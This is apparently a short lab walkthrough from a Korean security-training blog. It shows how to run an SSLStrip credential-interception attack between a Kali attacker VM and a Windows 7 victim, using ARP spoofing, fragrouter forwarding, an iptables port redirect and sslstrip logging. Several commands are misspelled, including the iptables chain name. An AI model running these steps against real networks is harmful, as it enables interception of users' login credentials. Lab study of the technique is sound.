본문 바로가기

NCS/기술적보안구축

To crack password use SSLStrip

This document is lap step for test sslstrip. We have need two virtual machines on Vmware Workstation for this lap complete.

 

For one system as victim and for another system as attacker.

 

Name of Role 

 IP / Mask

Gateway 

DNS 

Victim

192.168.0.31 

192.168.0.1 

8.8.8.8 

Attacker 

 192.168.0.33

192.168.0.1 

8.8.8.8 

 

 Attacker (Kali Linux)

 Verity the gateway address

# route -n

 

Rerouting after arp spoofing

# fragrouter -B1

 

Open the new terminal

Redirect from tcp 80 to tcp 10000

# iptables -t nat -A PREREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

 

ARP spoofing

# arpspoof -i eth0 192.168.0.31  192.168.0.1

 

Opne another new terminal

# python /usr/share/sslstrip/sslstrip.py -l 10000

 

# tail -f sslstrip.log

 

 

 

Victim (Windows 7) 

# https://www.live.com

 

You should do login.